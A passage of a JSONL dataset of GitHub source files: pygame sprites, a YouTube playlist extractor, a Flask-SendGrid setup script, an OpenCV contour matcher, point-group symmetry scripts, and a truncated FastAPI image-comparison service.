pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = game.player_image\n self.rect = self.image.get_rect()\n self.hit_rect = PLAYER_HIT_RECT\n self.hit_rect.center = self.rect.center\n self.vel = vec(0, 0)\n self.pos = vec(x, y) * TILESIZE\n self.rot = 0\n\n def get_action_input(self, action=0):\n\n if action == 0:\n # do nothing\n # set vx and vy = 0 if no key is pressed\n self.vel = vec(0, 0)\n self.rot_speed = 0\n elif action == 1:\n # forward and turn left\n self.rot_speed = PLAYER_SPEED\n self.vel = vec(PLAYER_SPEED * 0.9, 0).rotate(-self.rot)\n elif action == 2:\n # foward and turn right\n self.rot_speed = -PLAYER_SPEED\n self.vel = vec(PLAYER_SPEED * 0.9, 0).rotate(-self.rot)\n elif action == 3:\n # only forward\n self.vel = vec(PLAYER_SPEED * 0.9, 0).rotate(-self.rot)\n\n def get_action_input_type_2(self, action=0):\n\n # left is just turning 45 degree left and same with right\n if action == 0:\n # do nothing\n # set vx and vy = 0 if no key is pressed\n self.vel = vec(0, 0)\n self.rot_speed = 0\n elif action == 1:\n # turn left\n self.vel = vec(0, 0)\n self.rot_speed = PLAYER_SPEED * 2\n elif action == 2:\n # turn right\n self.vel = vec(0, 0)\n self.rot_speed = -PLAYER_SPEED * 2\n elif action == 3:\n # only forward\n self.rot_speed = 0\n self.vel = vec(PLAYER_SPEED, 0).rotate(-self.rot)\n\n def update(self):\n if self.rot_speed != 0:\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pg.transform.rotate(self.game.player_image, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.pos\n self.pos += self.vel * self.game.dt\n self.hit_rect.centerx = self.pos.x\n collide_with_walls(self, self.game.walls, \"x\")\n collide_with_walls(self, self.game.goals, \"x\")\n\n self.hit_rect.centery = self.pos.y\n collide_with_walls(self, self.game.walls, \"y\")\n collide_with_walls(self, self.game.goals, \"y\")\n self.rect.center = self.hit_rect.center\n\n\nclass Mob(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.mobs\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.mob_image\n self.rect = self.image.get_rect()\n self.hit_rect = MOB_HIT_RECT.copy()\n self.hit_rect.center = self.rect.center\n self.pos = vec(x, y) * TILESIZE\n self.rect.center = self.pos\n self.rot = 0\n self.vel = vec(0, 0)\n self.acc = vec(0, 0)\n\n def avoid_mobs(self):\n for mob in self.game.mobs:\n if mob != self:\n dist = self.pos - mob.pos\n if 0 < 
dist.length() < MOB_AVOID_RADIUS:\n self.acc += dist.normalize()\n\n def update(self):\n self.rot = (self.game.player.pos - self.pos).angle_to(vec(1, 0))\n self.image = pg.transform.rotate(self.game.mob_image, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.pos\n self.acc = vec(1, 0).rotate(-self.rot)\n self.avoid_mobs()\n if self.acc.length_squared() > 0:\n self.acc.scale_to_length(MOB_SPEED)\n self.acc += self.vel * -1\n self.vel += self.acc * self.game.dt\n self.pos += self.vel * self.game.dt + 0.5 * self.acc * self.game.dt ** 2\n self.hit_rect.centerx = self.pos.x\n collide_with_walls(self, self.game.walls, \"x\")\n self.hit_rect.centery = self.pos.y\n collide_with_walls(self, self.game.walls, \"y\")\n self.rect.center = self.hit_rect.center\n\n\nclass Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.tile_image\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n\n\nclass Goal(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.goals\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.goal_image\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n","repo_name":"sen-pai/gym_tag","sub_path":"gym_tag/envs/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23345799026","text":"import os\nimport google.auth\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\n\n# Set the path to the credentials file\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'Path\\to\\your\\credential\\json\\file' # <-- edit here\n\n# Get the credentials\ncreds, project_id = google.auth.default(scopes=['https://www.googleapis.com/auth/youtube.force-ssl'])\n\n# Build the API client\nyoutube = build('youtube', 'v3', credentials=creds)\n\n# Set the ID of the playlist you want to extract\nplaylist_id = 'your youtube playlist ID' # <-- edit here\n\n# Get the first page of the playlist items\nrequest = youtube.playlistItems().list(\n part='snippet',\n playlistId=playlist_id,\n maxResults=50\n)\nresponse = request.execute()\n\n# Keep looping until all pages have been processed\nwhile request is not None:\n # Get the next page of playlist items\n next_page_token = response.get('nextPageToken')\n items = response.get('items', [])\n\n # Extract the video IDs from the playlist items\n video_ids = [item['snippet']['resourceId']['videoId'] for item in items]\n\n # Save the video IDs to a file\n with open('video_ids.txt', 'a') as f:\n for video_id in video_ids:\n f.write(f'https://youtu.be/{video_id}\\n')\n\n # Exit the loop if there are no more pages\n if next_page_token is None:\n break\n\n # Prepare the next page request\n request = youtube.playlistItems().list(\n part='snippet',\n playlistId=playlist_id,\n maxResults=50,\n pageToken=next_page_token\n )\n response = request.execute()\n","repo_name":"08ben2011/youtubeLinks","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35584010520","text":"import unittest\nfrom q03_01_three_in_one import three_in_one\n\n\nclass TestQ03_01ThreeInOne(unittest.TestCase):\n def setUp(self):\n self.arr_len = 20\n\n def test_three_in_one(self):\n a, b, c = three_in_one(self.arr_len)\n arr = []\n for e in a:\n arr.append(e)\n for e in b:\n arr.append(e)\n for e in c:\n arr.append(e)\n for i in range(self.arr_len):\n self.assertEqual(i, arr[i])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nhenninger/CrackingTheCodingInterview6e","sub_path":"ch03_Stacks_and_Queues/test_q03_01_three_in_one.py","file_name":"test_q03_01_three_in_one.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73949546467","text":"\"\"\"\nFlask-SendGrid\n==============\n\nA Flask Extension to bridge between `Flask-Mandrill `_\nand sending emails with `SendGrid `_\n\nInstallation\n````````````\n\n.. code:: bash\n\n $ pip install flask-sendgrid\n\n\nUsage\n`````\n\n.. code:: python\n\n from flask import Flask\n from flask.ext.sendgrid import SendGrid\n\n app = Flask(__name__)\n app.config['SENDGRID_API_KEY'] = 'your api key'\n sendgrid = SendGrid(app)\n sendgrid.send_email(\n from_email='someone@yourdomain.com',\n to_email='someoneelse@someotherdomain.com',\n subject='Subject'\n text='Body',\n )\n\"\"\"\n\nimport sys\n\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\n\n\ndef get_requirements(suffix=''):\n with open('requirements%s.txt' % suffix) as f:\n rv = f.read().splitlines()\n return rv\n\n\ndef get_version():\n with open('flask_sendgrid.py', 'r') as fd:\n for line in fd:\n if line.startswith('__version__ = '):\n return line.split()[-1].strip().strip(\"'\")\n\n\nclass PyTest(TestCommand):\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = [\n '-v',\n '-xrs',\n '--cov', '.',\n '--cov-report', 'term-missing',\n '--pep8',\n '--flakes',\n '--cache-clear'\n ]\n self.test_suite = True\n\n def run_tests(self):\n import pytest\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\n_version = get_version()\n\n\nsetup(\n name='Flask-SendGrid',\n version=_version,\n url='http://github.com/frankv/flask-sendgrid',\n download_url='https://github.com/frankv/flask-sendgrid/tarball/' + _version,\n license='MIT',\n author='Frank Valcarcel',\n author_email='frank@cuttlesoft.com',\n description='Adds SendGrid support to Flask applications',\n long_description=open('README.rst').read() + '\\n\\n' + open('HISTORY.rst').read(),\n keywords=['Flask', 'SendGrid', 'email', 'smtp'],\n py_modules=['flask_sendgrid'],\n zip_safe=False,\n platforms='any',\n install_requires=['SendGrid'],\n tests_require=get_requirements('-test'),\n cmdclass={'test': PyTest},\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules']\n)\n","repo_name":"frankV/flask-sendgrid","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"70"}
+{"seq_id":"28647530711","text":"import os\nimport argparse\nfrom typing import Tuple, List\n\nimport cv2\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nclass Matcher:\n raw_path: str\n out_path: str\n line_color: Tuple[int]\n line_thickness: int\n im_raw: np.ndarray\n im_rgb: np.ndarray\n im_hsv: np.ndarray\n im_gray: np.ndarray\n im_filt: np.ndarray\n im_canny: np.ndarray\n im_closed: np.ndarray\n all_contours: List[np.ndarray]\n filt_contours: List[np.ndarray]\n ordered_contours: List[np.ndarray]\n\n def __init__(self, raw_path: str, out_path: str):\n self.raw_path = raw_path\n self.out_dir = out_path\n\n # Plotting/drawing defaults\n self.line_color = (255, 0, 0)\n self.line_thickness = 2\n self.line_type = cv2.LINE_AA\n self.font_face = cv2.FONT_HERSHEY_SIMPLEX\n self.font_scale = 1\n self.figsize = (16, 16)\n\n def match(self):\n\n (\n self.read_image()\n .preprocess_color_space()\n .get_highest_contrast_channel()\n .apply_bilateral_filter()\n .detect_edges()\n .close_open_edges()\n .find_contours()\n .draw_contours(self.all_contours, \"01-all-contours.png\")\n .filter_contours()\n .draw_contours(self.filt_contours, \"02-final-contours.png\", num=True)\n .sort_and_pair()\n .draw_paired_contours(\"03-final-matches.png\")\n )\n\n def read_image(self):\n if not os.path.isfile(self.raw_path):\n raise FileNotFoundError(f\"File not found at {self.raw_path}\")\n self.im_raw = cv2.imread(self.raw_path)\n return self\n\n def preprocess_color_space(self):\n self.im_rgb = cv2.cvtColor(self.im_raw, cv2.COLOR_BGR2RGB)\n self.im_hsv = cv2.cvtColor(self.im_rgb, cv2.COLOR_RGB2HSV)\n return self\n\n def get_highest_contrast_channel(self):\n channels = cv2.split(self.im_hsv)\n contrasts = [x.std() for x in channels]\n idx_max = np.argmax(contrasts)\n print(f\"Highest contrast is channel {idx_max}: {contrasts[idx_max]}\")\n self.im_gray = channels[idx_max]\n return self\n\n def apply_bilateral_filter(\n self, d: int = 5, sigma_color: int = 175, sigma_space: int = 175\n ):\n self.im_filt = cv2.bilateralFilter(self.im_gray, d, sigma_color, sigma_space)\n return self\n\n def detect_edges(self, min_val: int = 100, max_val: int = 150):\n self.im_canny = cv2.Canny(self.im_filt, min_val, max_val)\n return self\n\n def close_open_edges(\n self, kernel_size: Tuple[int] = (2, 2), num_iterations: int = 1\n ):\n kernel = np.ones(kernel_size, np.uint8)\n self.im_closed = cv2.morphologyEx(\n self.im_canny, cv2.MORPH_CLOSE, kernel, iterations=num_iterations\n )\n return self\n\n def find_contours(self):\n self.all_contours, _ = cv2.findContours(\n self.im_closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE\n )\n print(f\"Detected {len(self.all_contours)} contours\")\n return self\n\n def filter_contours(self, top_n: int = 30, min_points: int = 8):\n\n # Minimum area = half of mean area of top N contours\n cnt_areas = [cv2.contourArea(x) for x in self.all_contours]\n cnt_areas_top_n = sorted(cnt_areas)[-top_n:]\n cnt_areas_median = cnt_areas_top_n[top_n // 2]\n min_area = 0.5 * cnt_areas_median\n\n # Keep only circular contours above min_area and min_points\n circles = []\n for i in self.all_contours:\n\n # Approximate contours as simple polygon\n epsilon = 0.01 * cv2.arcLength(i, True)\n approx = cv2.approxPolyDP(i, epsilon, closed=True)\n\n # Keep only if approximate polygon is like a circle\n area = cv2.contourArea(i)\n if len(approx) > min_points and area > min_area:\n circles.append(i)\n\n self.filt_contours = circles\n print(f\"Kept {len(self.filt_contours)} of 
{len(self.all_contours)} contours\")\n        return self\n\n    def draw_contours(self, cnt: List[np.ndarray], out_name: str, num: bool = False):\n\n        # Draw contours\n        plt.figure(figsize=self.figsize)\n        im_temp = self.im_rgb.copy()\n        cv2.drawContours(im_temp, cnt, -1, self.line_color, self.line_thickness)\n\n        # Label each contour with a number\n        if num:\n            for idx, i in enumerate(cnt):\n\n                # Compute contour centroid\n                m = cv2.moments(i)\n                x = int(m[\"m10\"] / m[\"m00\"])\n                y = int(m[\"m01\"] / m[\"m00\"])\n\n                # Label text\n                cv2.putText(\n                    im_temp,\n                    text=str(idx + 1),\n                    org=(x, y),\n                    fontFace=self.font_face,\n                    fontScale=self.font_scale,\n                    color=self.line_color,\n                    thickness=self.line_thickness,\n                    lineType=self.line_type,\n                )\n\n        # Plot and save figure\n        output_name = os.path.join(self.out_dir, out_name)\n        plt.imshow(im_temp)\n        plt.savefig(output_name)\n\n        return self\n\n    def sort_and_pair(self):\n        sorted_contours = sorted(self.filt_contours, key=lambda x: cv2.contourArea(x))\n        odd_idx = list(range(0, len(self.filt_contours) - 1, 2))\n        self.ordered_contours = [\n            (sorted_contours[x], sorted_contours[x + 1]) for x in odd_idx\n        ]\n        print(f\"{len(odd_idx) * 2} of {len(sorted_contours)} contours paired\")\n        return self\n\n    def draw_paired_contours(self, out_name: str):\n\n        plt.figure(figsize=self.figsize)\n        im_temp = self.im_rgb.copy()\n        cmap = matplotlib.cm.get_cmap(\"Dark2\")\n\n        for idx, i in enumerate(self.ordered_contours):\n\n            # Draw circle\n            r, g, b, a = (int(x) for x in cmap(idx % cmap.N, bytes=True))\n            line_color = (r, g, b)\n            cv2.drawContours(im_temp, i, -1, line_color, thickness=cv2.FILLED)\n\n            for j in i:\n                # Label with pair idx\n                m = cv2.moments(j)\n                x = int(m[\"m10\"] / m[\"m00\"])\n                y = int(m[\"m01\"] / m[\"m00\"])\n                cv2.putText(\n                    im_temp,\n                    text=str(idx + 1),\n                    org=(x, y),\n                    fontFace=self.font_face,\n                    fontScale=self.font_scale,\n                    color=(255, 255, 255),\n                    thickness=self.line_thickness,\n                    lineType=self.line_type,\n                )\n\n        output_name = os.path.join(self.out_dir, out_name)\n        plt.imshow(im_temp)\n        plt.savefig(output_name)\n        print(f\"Matches saved to {output_name}\")\n\n        return self\n\n\nif __name__ == \"__main__\":\n\n    # Get inputs from user\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"-i\", \"--input-path\", dest=\"raw_path\", help=\"filepath to input image\"\n    )\n    parser.add_argument(\n        \"-o\", \"--output-path\", dest=\"out_path\", help=\"Directory to save outputs to\"\n    )\n    args = parser.parse_args()\n\n    # Match\n    Matcher(args.raw_path, args.out_path).match()\n","repo_name":"jtanwk/macaron-match","sub_path":"macaron-match/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"70298879268","text":"import smelli\nimport wcxf\nimport yaml\nimport ipywidgets as widgets\nfrom IPython.display import Markdown,display\n\n\n# allowed bases\n# WET: everything that can be translated to flavio\nbases_wet = ['flavio'] + [f for eft,f, t in wcxf.Basis['WET', 'flavio'].known_translators['to']]\n# SMEFT: everything that can be matched onto JMS\nbases_smeft = ['Warsaw'] + [b1 for eft1, b1, eft2, b2 in wcxf.Matcher.instances\n if eft1 == 'SMEFT' and eft2 == 'WET' and b2 == 'JMS'\n and b1 != 'Warsaw']\neft_bases = {'SMEFT': bases_smeft, 'WET': bases_wet}\n\ngl = None\n\n\ndef print_basis(basis):\n pass\n\ndef f_basis(eft):\n select_basis.options = eft_bases[eft]\n\n\nselect_eft = widgets.Select(options=['SMEFT', 'WET'])\ninit = select_eft.value\nselect_basis = widgets.Select(options=eft_bases[init])\n\nwidget_basis = widgets.interactive(print_basis, basis=select_basis)\nwidget_eft = widgets.interactive(f_basis, eft=select_eft)\n\ndef read_yaml(s):\n if not s:\n return {}\n d = yaml.load(s)\n return {k: complex(v) if isinstance(v, str) else v for k, v in d.items()}\n\nta_wc = widgets.Textarea(description=\"Wilson coefficients\",\n layout=widgets.Layout(min_width='50%', height='300px'),\n style={'description_width': 'initial'})\nt_scale = widgets.Text(description=\"Scale in GeV\", value='91.1876')\n\ndef basis_pdf_link(eft, basis):\n display(Markdown('[List of {0} {1} basis operators (PDF)](https://wcxf.github.io/assets/pdf/{0}.{1}.pdf)'.format(eft, basis)))\n\nout_basispdf = widgets.interactive_output(basis_pdf_link,\n {'eft': select_eft, 'basis': select_basis})\n","repo_name":"smelli/smelli-playground","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29444768698","text":"# =================================================\n\nimport numpy as np\n#from numpy import * \nfrom all_pg_irreps import all_pg_irreps\nfrom PG import symop, Pointgroup\nimport pickle as pk\nimport os\n\n# ======================================================\n\n'''\nfor i in range( 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\tassert len( xx['dv_irreps'] ) == len( xx['sym_ops'] ) \n\tfor j in range( len(xx['sym_ops']) ) :\n\t\tprint( xx[ 'sym_ops' ][j][0] )\n\t\tfor k in range( len(xx['dv_irrep_names']) ) :\n\t\t\tprint( xx['dv_irrep_names'][k] )\n\t\t\tprint( xx['dv_irreps'][j][k] )\n\t\tprint( '\\n' )\n\tprint( '\\n' )\n'''\n\n'''\nfor i in range( 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\tfor op in xx[ 'sym_ops' ] :\n\t\tmat = op[1]\n\t\tfind = False\n\t\top_square = ''\n\t\tfor opp in xx[ 'sym_ops' ] :\n\t\t\tmat_tmp = opp[1]\n\t\t\tif np.linalg.norm( np.dot( mat, mat ) - mat_tmp ) < 1e-6 :\n\t\t\t\tfind = True \n\t\t\t\top_square = opp[0] \n\t\tassert find \n\t\tprint( op[0], op_square )\n\tprint( '\\n' )\n'''\n\n\n# ==============================================================\n# test rep_decompose\n\n'''\nfrom decompose_into_irreps import decompose_rep\n\nfor i in range( 31, 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\tassert len( xx['dv_irreps'] ) == len( xx['sym_ops'] ) \n\treps = [ ]\n\tnrep = len( xx['dv_irrep_names'] )\n\tnop = len( xx['sym_ops'] )\n\tfor i in range( nrep ) :\n\t\trep = [ ]\n\t\tfor j in range( nop ) :\n\t\t\trep.append( xx['dv_irreps'][j][i] )\n\t\treps.append( rep )\n\t\n\t#for rep in reps :\n\t#\tprint( rep )\n\t#\tprint( '\\n' )\n\tprint( len(reps), len(reps[0]) )\n'''\t\n\n# ========================================================\n# find all Kramers pairs \n# ========================================================\n\n'''\nfor ipg in range( 32 ) :\n\tprint( 'PG:', ipg+1 )\n\tpg = all_pg_irreps[ipg]\n\top_square_dic = { }\n\tnop = len( pg['sym_ops'] )\n\tfor i in range( nop ) :\n\t\topp = [ j for j in range(nop) if np.linalg.norm( \\\n\t\t\tnp.dot( pg['sym_ops'][i][1], pg['sym_ops'][i][1] ) \\\n\t\t\t- pg['sym_ops'][j][1] ) < 1e-6 ]\n\t\tassert len(opp) == 1, ( len(opp), pg['sym_ops'][i][0] ) \n\t\topp = opp[0]\n\t\top_square_dic[i] = opp\n\t#\n\tKramers = [ ]\n\tnirreps = len( pg['dv_irrep_names'] )\n\tfor ir in range( nirreps ) :\n\t\tirrep = [ pg['dv_irreps'][k][ir] for k in range(nop) ]\n\t\tirrep_name = pg['dv_irrep_names'][ir]\n\t\t#print( irrep_name )\n\t\t#print( irrep )\n\t\tassert len( irrep ) == nop\t\t\n\t\ttot = 0\n\t\tfor iop in range(nop) :\n\t\t\tmat = irrep[iop]\n\t\t\tmat_2 = irrep[op_square_dic[iop]]\n\t\t\tzgg = 0\n\t\t\tpl = np.linalg.norm( np.dot( mat, mat ) - mat_2 ) \n\t\t\tmi = np.linalg.norm( np.dot( mat, mat ) + mat_2 ) \n\t\t\tif pl < 1e-4 :\n\t\t\t\tzgg = 1\n\t\t\telif pl > 1e-4 :\n\t\t\t\tzgg = -1\n\t\t\tassert zgg in [1,-1], ( ipg+1, irrep_name, mat, mat_2 )\n\t\t\tassert zgg in [1,-1], ( pg['sym_ops'][iop][0], pg['sym_ops'][op_square_dic[iop]][0] )\n\t\t\ttr = np.trace( mat_2 ) \n\t\t\ttot += zgg*tr\n\t\ttot = -tot/nop\n\t\treal = tot.real\n\t\timag = tot.imag\n\t\tassert abs( real - round(real) ) < 1e-4\n\t\tassert abs( imag ) < 1e-4\n\t\ttot = int(round(real))\n\t\t#print( 'tot:', tot )\n\t\tassert tot in [ 1, -1, 0 ], tot \n\t\tif tot == 1 : # degenerace is unchanged\n\t\t\tpair = [ irrep_name ]\n\t\t\tif pair not in Kramers :\n\t\t\t\tKramers.append( pair )\n\t\telif tot == -1 : # two same irreps are paired\n\t\t\tpair = [ irrep_name, 
irrep_name ] \n\t\t\tif pair not in Kramers :\n\t\t\t\tKramers.append( pair )\n\t\telse : # two conjugate irreps are paired \n\t\t\t# find conjugate irrep\n\t\t\tirrep_conj = [ ma.conjugate() for ma in irrep ]\n\t\t\tassert len( irrep_conj ) == nop, len( irrep_conj )\n\t\t\tfind_conj = False\n\t\t\tirrep_conj_name = ''\n\t\t\tfor jr in range( nirreps ) :\n\t\t\t\tirrep_tmp = [ pg['dv_irreps'][k][jr] for k in range(nop) ]\n\t\t\t\tirrep_name_tmp = pg['dv_irrep_names'][jr]\n\t\t\t\tassert len( irrep_tmp ) == nop, len( irrep_tmp )\n\t\t\t\tif all( [ abs( np.trace(irrep_conj[i_tmp]) - np.trace(irrep_tmp[i_tmp]) ) \\\n\t\t\t\t\t\t< 1e-4 for i_tmp in range(nop) ] ) :\n\t\t\t\t\tfind_conj = True\n\t\t\t\t\tirrep_conj_name = irrep_name_tmp\n\t\t\t\t\tbreak\n\t\t\tassert find_conj, ( ipg+1, irrep_name )\n\t\t\tpair = sorted( [ irrep_name, irrep_conj_name ] ) \n\t\t\tif pair not in Kramers :\n\t\t\t\tKramers.append( pair )\n\t\t#print( '\\n' )\n\tprint( 'Kramers:', Kramers )\t\n\tprint( '\\n' )\n'''\n\n# =====================================================\n# Inverse (pair) \n# =====================================================\n\n'''\nfor ipg in range( 32 ) :\n\tprint( 'PG:', ipg+1 )\n\tpg = all_pg_irreps[ipg]\n\top_square_dic = { }\n\tnop = len( pg['sym_ops'] )\n\tfor i in range( nop ) :\n\t\topp = [ j for j in range(nop) if np.linalg.norm( \\\n\t\t\tnp.dot( pg['sym_ops'][i][1], pg['sym_ops'][i][1] ) \\\n\t\t\t- pg['sym_ops'][j][1] ) < 1e-6 ]\n\t\tassert len(opp) == 1, ( len(opp), pg['sym_ops'][i][0] ) \n\t\topp = opp[0]\n\t\top_square_dic[i] = opp\n\t#\n\tpairs = [ ]\n\tnirreps = len( pg['dv_irrep_names'] )\n\tfor ir in range( nirreps ) :\n\t\tirrep = [ pg['dv_irreps'][k][ir] for k in range(nop) ]\n\t\tirrep_name = pg['dv_irrep_names'][ir]\n\t\t#print( irrep_name )\n\t\t#print( irrep )\n\t\tassert len( irrep ) == nop\t\t\n\t\tfind_inv = False\n\t\tirrep_inv_name = ''\n\t\tfor jr in range( nirreps ) :\n\t\t\tirrep_tmp = [ pg['dv_irreps'][k][jr] for k in range(nop) ]\n\t\t\tirrep_name_tmp = pg['dv_irrep_names'][jr]\n\t\t\tassert len( irrep_tmp ) == nop, len( irrep_tmp )\n\t\t\tif all( [ abs( np.linalg.norm( irrep[i_tmp] + irrep_tmp[i_tmp] ) ) \\\n\t\t\t\t\t\t< 1e-4 for i_tmp in range(nop) ] ) :\n\t\t\t\tfind_inv = True\n\t\t\t\tirrep_inv_name = irrep_name_tmp\n\t\t\t\tbreak\n\t\tassert find_inv, ( ipg+1, irrep_name )\n\t\tpair = sorted( [ irrep_name, irrep_inv_name ] ) \n\t\tif pair not in pairs :\n\t\t\tpairs.append( pair )\n\t\t#print( '\\n' )\n\tprint( 'pairs:', pairs )\t\n\tprint( '\\n' )\n'''\n\n# =================================================================\n# generate 32 PGs \n# =================================================================\n\n'''\nif not os.path.exists('PG') :\n\tos.mkdir('PG')\t\t\n\t\nfor i in range( 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\t#print( xx['sym_ops'] )\n\tops = [ symop( opp[1], opp[0] ) for opp in xx['sym_ops'] ]\n\t#for op in ops :\n\t#\tprint(op.mat)\n\tipg = i+1\n\tpg = Pointgroup( ops, ipg )\n\t#print( pg.cls )\n\t#print( '\\n' ) \n\tname = './PG/'+str(ipg)+'.dat'\t\t\n\tfd = open(name, 'wb')\t\t\n\tpk.dump(pg,fd)\t\t\n\tfd.close()\n'''\n\n# ========================================================================\n# get point group \n# ========================================================================\n\ndef getPG( ipg ) :\n\tname = './PG/'+str(ipg)+'.dat'\t\t\n\tfd = open(name, 'rb')\t\t\n\tpg = pk.load(fd)\t\t\n\tfd.close()\n\treturn pg\n\n# =====================================================================\n\nT = 
getPG(28)\nfor op in T.op:\n\tprint( op.name )\niC2x = 3\niC2z = 1\niC2y = 2 \niC3111p = 4\n\niC2x_inv = T.inv[iC2x]\niC2y_inv = T.inv[iC2y]\niC2z_inv = T.inv[iC2z]\n#print( T.mut[ ( iC3111p, iC2z ) ] )\nprint( T.mut[ ( iC2x_inv, T.mut[ ( iC3111p, iC2z ) ] ) ] )\nprint( T.mut[ ( iC2y_inv, T.mut[ ( iC3111p, iC2x ) ] ) ] )\nprint( T.mut[ ( iC2z_inv, T.mut[ ( iC3111p, iC2y ) ] ) ] )\n#subgroup = T.get_subgroup( [ iC2x,iC2y,iC2z ] ) \nsubgroup = T.get_subgroup( [ iC3111p ] ) \nprint( T.get_coset( subgroup ) )\n\n'''\nfor i in range( 1, 33 ) :\n\tfor op in getPG(i).op :\n\t\tprint( op.name )\n\t\tprint( op.su2 )\n\tprint( '\\n' )\n'''\n\n","repo_name":"pengbingrui26/Point_group_datas","sub_path":"irreps.py","file_name":"irreps.py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27183686587","text":"import datetime\nimport io\nimport cv2\nfrom fastapi import (\n FastAPI, \n UploadFile, \n File, \n HTTPException, \n status,\n Depends\n)\nfrom fastapi.responses import Response\nimport numpy as np\nfrom functools import cache\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom PIL import Image\nfrom middlewares.inference import Comparator\nfrom utils.config import get_settings\nfrom utils.responses import StatusResponse\nfrom pydantic import BaseModel\nfrom middlewares.inference import Comparison\nfrom utils.image_processor import ImageProcessor, Type_Enum, process_images\nfrom fastapi.responses import StreamingResponse\nimport csv\nfrom io import StringIO\n\nSETTINGS = get_settings()\n\nentries = []\n\napp = FastAPI(title=SETTINGS.api_name, version=SETTINGS.api_version)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"], \n allow_headers=[\"*\"], \n)\n\nIMAGES_PATH = SETTINGS.images_path\n\n\nimages_dict = {\n 0: '../first_project/assets/base/original/harrypotter-og.png',\n 1: '../first_project/assets/base/original/lalaland-og.png',\n 2: '../first_project/assets/base/original/msdoubtfire-og.png',\n 3: '../first_project/assets/base/original/starwars-og.png',\n 4: '../first_project/assets/base/original/taxidriver-og.png',\n 5: '../first_project/assets/base/original/theshowman-og.png',\n 6: '../first_project/assets/base/original/titanic-og.png',\n}\n\n@cache \ndef get_comparator():\n print(\"Creating comparator...\")\n return Comparator()\n\ndef create_entry(result, image_1, shape, image_2_name):\n return {\n \"id\": len(entries) + 1,\n\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"image_input\": image_1.filename,\n \"image_input_size\": shape,\n \"image_target\": image_2_name.split(\"/\")[-1],\n \"similarity\": result.similarity,\n \"time_ms\": result.time_ms,\n \"model\": SETTINGS.name_of_model\n\n }\ndef upload_and_compare(file1, file2, comparator, mod_name):\n img_stream_1 = io.BytesIO(file1.file.read())\n with open(file2, \"rb\") as file:\n image_content = file.read()\n img_stream_2 = io.BytesIO(image_content)\n if file1.content_type.split(\"/\")[0] != \"image\":\n raise HTTPException(\n status_code=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE, \n detail=\"Not an image\"\n )\n img_obj_1 = Image.open(img_stream_1)\n img_obj_1 = np.array(img_obj_1)\n img_obj_2 = Image.open(img_stream_2)\n img_obj_2 = np.array(img_obj_2)\n\n img_route_1 = f\"{IMAGES_PATH}/input-{mod_name}.png\"\n img_route_2 = f\"{IMAGES_PATH}/target-{mod_name}.png\"\n\n img_obj_1 = cv2.cvtColor(img_obj_1, cv2.COLOR_RGB2BGR)\n img_obj_2 = cv2.cvtColor(img_obj_2, cv2.COLOR_RGB2BGR)\n\n cv2.imwrite(img_route_1, img_obj_1)\n cv2.imwrite(img_route_2, img_obj_2)\n\n image_size = process_images()\n 